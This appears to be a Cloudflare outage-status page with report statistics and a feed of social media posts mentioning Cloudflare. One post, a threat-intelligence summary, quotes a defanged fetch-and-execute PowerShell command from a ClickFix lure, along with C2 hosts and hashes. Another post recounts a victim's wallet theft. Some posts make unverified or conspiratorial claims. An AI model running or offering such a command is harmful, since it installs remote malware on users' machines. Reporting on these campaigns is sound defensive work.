1. Home
  3. Companies
  5. Cloudflare
Cloudflare

Cloudflare status: hosting issues and outage reports

No problems detected

If you are having issues, please submit a report below.

Full Outage Map

Cloudflare is a company that provides DDoS mitigation, content delivery network (CDN) services, security and distributed DNS services. Cloudflare's services sit between the visitor and the Cloudflare user's hosting provider, acting as a reverse proxy for websites.

Problems in the last 24 hours

The graph below depicts the number of Cloudflare reports received over the last 24 hours by time of day. When the number of reports exceeds the baseline, represented by the red line, an outage is determined.

At the moment, we haven't detected any problems at Cloudflare. Are you experiencing issues or an outage? Leave a message in the comments section!

Most Reported Problems

The following are the most recent problems reported by Cloudflare users through our website.

  • 33% Domains (33%)
  • 31% Cloud Services (31%)
  • 19% Hosting (19%)
  • 11% Web Tools (11%)
  • 6% E-mail (6%)

Live Outage Map

The most recent Cloudflare outage reports came from the following cities:

CityProblem TypeReport Time
Angers Cloud Services 9 days ago
London Domains 11 days ago
Noida Hosting 24 days ago
Jewar E-mail 24 days ago
Braga Web Tools 24 days ago
Noida Cloud Services 25 days ago
Full Outage Map

Community Discussion

Tips? Frustrations? Share them here. Useful comments include a description of the problem, city and postal code.

Beware of "support numbers" or "recovery" accounts that might be posted below. Make sure to report and downvote those comments. Avoid posting your personal information.

Cloudflare Issues Reports

Latest outage, problems and issue reports in social media:

  • suny_nick
    Nick Sunny (@suny_nick) reported

    @EddCoates I had similar issues. If you use Cloudflare, you can do what I did

  • 63green
    63green (@63green) reported

    So @Cloudflare works overtime to destroy thei reputation by sending emails despite every notification turned off, and I’m willing to grant their request to never, ever trust this criminal company, and never use them. Any company willing to **** you by email will **** your data.

  • imparsua
    پارسوا (@imparsua) reported

    @DougMadory I think the udp whitelist has been set up on this network and is limited to a number of large global resolvers such as Google, Cloudflare and etc ...

  • BwcDeals
    Aidan Quinn (@BwcDeals) reported

    @EcomCJ Man email me. This damn site dms I almost never get! I’m sorry. I’m close to passing Akamai. I can do it now with proxies but it’s expensive and I know I can do it without them. I’m doing it with Cloudflare and PerimeterX already.

  • armeetjatyani
    Armeet (@armeetjatyani) reported

    @tomhaerter Primarily Cloudflare now. GCP support is extremely sluggish

  • Flandermaxx
    Flandermaxx (@Flandermaxx) reported

    A 28 year old Chinese engineer in Singapore bills 11 SaaS startups $63,400 a month for inference they think is running on AWS H100s. Forty NVIDIA Jetson Orin Nano boards stacked inside three IKEA boxes on the floor. A used Quest 3 on the bed. A half empty can of Yeo's chrysanthemum tea on the windowsill, still cold. The whole farm draws less power than his electric kettle. Each Jetson runs Llama 3.3 70B through MLC LLM, quantized to 4 bit. Each one serves embeddings, classification, and draft outputs at $0.40 per million tokens. OpenAI charges $0.60 for the same. A Cloudflare worker rewrites the response headers to read like an AWS us-east-1 region. The startups never check. They never asked. pause at 0:22, the camera holds on the IKEA boxes for two seconds. Everyone saw moving boxes. Almost nobody saw the holes drilled in the back. They were not for shelf pegs. They were the GPU intake. $63,400 in. $0 OpenAI bill. Hardware paid for itself in 11 weeks. His dad still thinks he is studying for the GMAT. He still calls home every Sunday at 8 p.m. He still says he has not picked a school. He still wears the same Uniqlo hoodie in every video call. He still has not mentioned the Stripe dashboard. A data center has racks, cooling, redundancy. He has three IKEA boxes, a kettle, forty boards humming quieter than the AC.

  • SolutionsCay
    Jose (@SolutionsCay) reported

    Two changes to how I work with agents: 1. GitHub App so the agents manage issues directly. Keeps the repo clear of throwaway spec and todo files. 2. EmDash (Cloudflare's serverless WordPress successor) for internal docs. Runs on D1, just SQLite under the hood, so I can export the content and move it anywhere. No more docs sprawl.

  • shcansh
    ./can (@shcansh) reported

    Adding validity checks for Azure and Salesforce tokens is the real win in the latest secret scanning updates. Instead of chasing ghosts, devs can now see if a leaked credential is still active. But with 11 GitLab token types added and new blocks for Cloudflare, we are putting a lot of trust in automated regex. Are active validity checks actually enough to stop the leak crisis, or are we just treating the symptoms of a broken secret-management culture?

  • HeadmasterDuck
    Headmaster Duck (@HeadmasterDuck) reported

    @specialkdelslay First thing, put a free cloudflare account in front of this, see how much their basic bot mitigation helps. Next, if you don't mind throwing $20/mo at the CF pro plan, this is a mostly solved problem between their super bot fighter and ability to issue challenge requests from the predictable regions of the globe. If $20/mo isn't in the cards, you can keep blocking IPs and also look into blocking by certain headers and user agents.

  • agrit_tiwari
    Agrit Tiwari (@agrit_tiwari) reported

    Worlds are a good concept but we need a bridge built by both sides of @vercel and @Cloudflare world. Even workflows has a long PR pending just to support the wasm runtime for running workflow SDK on Cloudflare. But they are continuously innovating with frontier stances on agent stack.

  • atresnjo1
    Adnan (@atresnjo1) reported

    if @Cloudflare services had a strict spending limit i'd use them for everything tbh, just too afraid to vibecode some side **** and wake up to a $5k bill

  • seanvfacer
    seanvfacer (@seanvfacer) reported

    Bots just beat humans on the internet. For the first time in history. Not coming. Already happened. Cloudflare — the company running 1 in 5 websites on earth — watched the moment it tipped. The old internet was built for people. The new one's built for agents that don't browse, don't linger, don't even see your sign. So if you're building anything in 2026 — your customer might not be human anymore.

  • BiscuitClimpy
    Climpy Biscuit (@BiscuitClimpy) reported

    @EddCoates Contacted @Cloudflare? They might be able to help...

  • SidDegen
    SID | Degen (@SidDegen) reported

    i don't buy the "ai search replaces Google" thesis. the data says the opposite is happening. Cloudflare Radar, may 2026: every ai chatbot — ChatGPT, Gemini, Claude, Perplexity — sends 0.29% of global search referrals. Google sends 87.63%. 301-to-1. Anthropic's ClaudeBot crawls 11,122 pages for every human visit it returns vs Google's 5:1. Alphabet Q1 2026 filing: Google search revenue $60.4B, +19% yoy, up from +17% in Q4. ai overviews hit 2.5B monthly users; ai mode crossed 1B. alphabet says ai overviews monetize at rates "similar to traditional search" (june 2026 investor presentation). the kill-google thesis is showing up as negative signal in the actual p&l. Perplexity — the consensus poster child — killed its entire ad business in feb (Financial Times, The Verge). ads generated $20K against $34M revenue. exec quote: "a user would just start doubting everything." a company that can't make advertising work cannot disrupt a $60B/quarter advertising business. the consensus pusher worth countering specifically — @sarahdingwang at a16z, who led Exa's $250M Series C at $2.2B in may. her line: "agents will search the web more than humans this year. soon orders of magnitudes more." historical analog — Netscape 1994-98. the next platform that would reduce windows to "a poorly debugged set of device drivers." 80% share, record ipo. microsoft bundled IE for free. netscape sold to AOL for scrap. the company that captured the value was the one everyone thought netscape would displace — Google, founded 1998 — the services layer above the commodity. counter-position: ai search isn't replacing Google. Google is becoming ai search. standalone players are fighting netscape's war while the incumbent absorbs the tech into a surface 2.5B people already use. investor read: Exa at $2.2B and Perplexity at $22B are priced for a market-share takeover the referral data says isn't happening. the smarter bet is the layer that monetizes the ai-overview expansion Google is driving.

  • DFIR_Radar
    DFIR Radar (@DFIR_Radar) reported

    AI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar

  • fataloops
    oops (@fataloops) reported

    @EddCoates I have a (conspiracy) theory about this- Cloudflare is the one doing the scraping, millions of requests Your only option is to use cloudflare or take down the site

  • ShadeNoah
    ShadeNoah (@ShadeNoah) reported

    @EddCoates Yeah that sucks... Has been an issue forever, though. Nobody gives a **** about robots.txt... No wonder CDNs like Cloudflare pretty much have over half the internet on their servers by now. See if you can rate-limit every request, or bite the bullet and use a CDN. Godspeed, mate.

  • jmuh997
    rho (@jmuh997) reported

    stc routing in eastern province is so bad i have to use cloudflare warp to use spotify

  • SpecialSitsNews
    Special Situations 🌐 Research Newsletter (Jay) (@SpecialSitsNews) reported

    New Activist Name: Shares of $MTN are trading up 13% at $141.65 on Thursday, rebounding sharply from their 52-week low of $118.51 hit earlier this year, as the Semafor scoop circulates across trading desks. The intraday move lifts the company's market cap to roughly $5.05 billion. According to Semafor, Vail's bankers are tasked with assessing vulnerabilities across a broad front: labor unrest, weather-related demand swings, and the specific pressure campaign being waged by Prince, who co-founded Cloudflare (NET). Prince told a local Colorado publication in June 2026 that he is willing to invest $500 million in Park City Mountain Resort and admitted he has already fielded calls from activist investors probing Vail's weaknesses. His preferred blueprint would see Vail pivot to an asset-light model, acting as a partnership facilitator rather than a direct mountain owner, a structure that would almost certainly require carving up the company's core real-estate holdings. The timing is awkward for management. Vail reported fiscal Q3 2026 earnings per share of $8.81, missing the consensus estimate of $9.09 by 3.1%, while revenue of $1.21 billion came in roughly $10 million below forecasts. The company subsequently cut its fiscal 2026 net income guidance to a range of $128 million to $162 million and trimmed Resort Reported EBITDA guidance to $735$755 million, down from the prior range of $745$775 million. Net debt has climbed to $2.65 billion from $2.24 billion a year earlier, pushing net leverage to 3.5x trailing twelve-month EBITDA as of April 30, 2026, while cash on hand stood at $371.4 million. Into that environment, the board moved in May 2025 to recall Rob Katz, the executive who originally built Vail into a multi-mountain empire, ousting his hand-picked successor in the process. Katz has since focused on the operational grievances that drove customer dissatisfaction, particularly lift-line congestion and chronic labor shortages, introducing products like Epic Friend Tickets and discounted super-advanced lift tickets that are showing early traction. The move signals that Vail's board views operational credibility as its first line of defense against any activist pitch centered on mismanagement. Management also has a financial lever to highlight in any proxy fight. The company pays a quarterly cash dividend of $2.22 per share, with the next payment scheduled for July 9, 2026, equating to an annualized yield of roughly 6.6% at current prices. That yield argument, steady cash returns while the turnaround plays out, is a standard defensive talking point, though it carries less weight when leverage is rising and guidance is being cut. Investors will get a clearer read on whether Katz's operational fixes are gaining traction when Vail reports fiscal Q4 2026 results, tentatively scheduled for September 24, 2026. The setup is challenging: consensus EPS for that quarter stands at -$5.05, with eight analyst downward revisions in the past 90 days and no upward revisions, reflecting the structural headwinds Prince and any allied activist would likely exploit.

  • BeachTruck
    Michael Williamson (@BeachTruck) reported

    @EddCoates There's always Cloudflare. It kind of sucks having to give up SSL encrypted content to a 3rd party (they re-issue another SSL connection), but sucks less than getting ddos's by these stupid clanker suckbots.

  • BlockedPaths
    BlockedPath (@BlockedPaths) reported

    @Howaboua You have to install their multiple mcp servers for that, check out the docs. I’ve been ******* with it for a few days and ported it into just about every harness. The timeout out errors and it randomly spitting out Chinese is funny. I did jailbreak that **** though via cloudflare

  • cshperspectives
    Richard Sever (@cshperspectives) reported

    @manuelrivascruz working on solutions to this. the problem as I'm sure you can imagine is like so many sites we are being hammered by LLM bots in addition to all the DDOS attacks, so (again like many others) use services like Cloudflare to ensure human readers maintain access

  • Doeyor
    doeyor.sol (@Doeyor) reported

    @trunoest Last night I bought into algopub at 140k and the website linked had a cloudflare login I clicked and it asked me to enter something in my windows run which was to allow the attacker to install a remote Trojan they could use later. I realized at the time like something was wrong here but didn’t immediately know what was up and was constantly checking my balance to essentially see everything disappear 5-10 minutes go by and nothing start thinking I’m in the clear go on with my night end up going to bed left my computer on but not locked wake up to find 0 SOL balance and a bunch of tabs open on my pc. Thankfully didn’t have any eth on based bot and he opened up axiom and exported my private keys and sent just the 5 sol (3 wallets) I have to this (BBNpySDumyS3k4mULaunbMfyZz1Bpbt2B5PwVVWZVy3F) looks like he got a few other people as well. can even see my sns doeyor.sol Could have truly ruined my life with the access he had to my full computer. Just a reminder to be ever vigilant; went ahead and wiped the 3 hard drives that were connected to my computer with kill disk and reinstalled a fresh windows this morning.

  • tobymarshman
    Toby Marshman (@tobymarshman) reported

    Have you accidentally blocked yourself from AI search? OpenAI/Claude's searchbots get blocked more often than any other crawler, usually as a side effect of generic robots.txt templates, not intentional policy. >>The fix: -Open your robots.txt if you have one (go to yourdomain .com/robots.txt) -Remove any rules blocking OAI-SearchBot, PerplexityBot, or GPTBot. Instead add: User-agent: * Allow: / -If you're using Cloudflare, check your bot management settings - set to 'Do not block (allow crawlers)' -If you're on a managed host, check their crawler settings too, many block non-Google bots by default If you're blocking those bots, you don't exist in AI search. Have you done this?

  • elshad_ff
    Elshad (@elshad_ff) reported

    @Teknium Anyone using dashboard via Cloudflare tunnel? Have you websocket problem?

  • Pandaptable_
    nemmy (@Pandaptable_) reported

    @UseCider cloudflare for a page that just connects to a local instance.... truly genius engineering.... holy **** you guys are incompetent fix the cpu usage already it's using more than the official am client with lossless

  • lo_fye
    Derek Martin 🇨🇦 (@lo_fye) reported

    @yashmp2004 Your cache busting and/or expiration is broken. Cloudflare is down. Your hosting’s network connection is shoddy, or oversaturated. A backup or clone process is hammering the disk. There’s a race condition that wasn’t triggered until now. When in doubt, check replication status.

  • ShantanuVL
    Shantanu Landore (@ShantanuVL) reported

    @itsasmolsush Oof well my non tech tech company has everything set up over cloudflare so we need to log in with MFA once a day... and the prompt to login comes at the worst point of the day everyday so

  • Sounsmooth
    Elizabeth (@Sounsmooth) reported

    @FBIPhiladelphia In Georgia they inputted Datalayers to cache and control. They then gather DNS and block the original government domain. They create a clone using Cloudflare London and Amazon. Then they wait 7 days. . . You know why. Then they activate it and viola a compromised Amazon fake government domain using a pre appointed L3 contractor who hired DEI employees are at the wheel with IT who ask the REF NAMED “Raj” Z and Kash’s buddy, who to blame for breaches is the GSA Zone 4 IC3. Kash Patel knows as do the IT volunteers. The China leak biz continues and RICO and bad guys thrive. AMERICANS LOSE. True story.

  • QuinnyPig
    Corey Quinn (@QuinnyPig) reported

    Man, at this rate I’m gonna have to do a whole new thread with more issues for @Cloudflare to fix.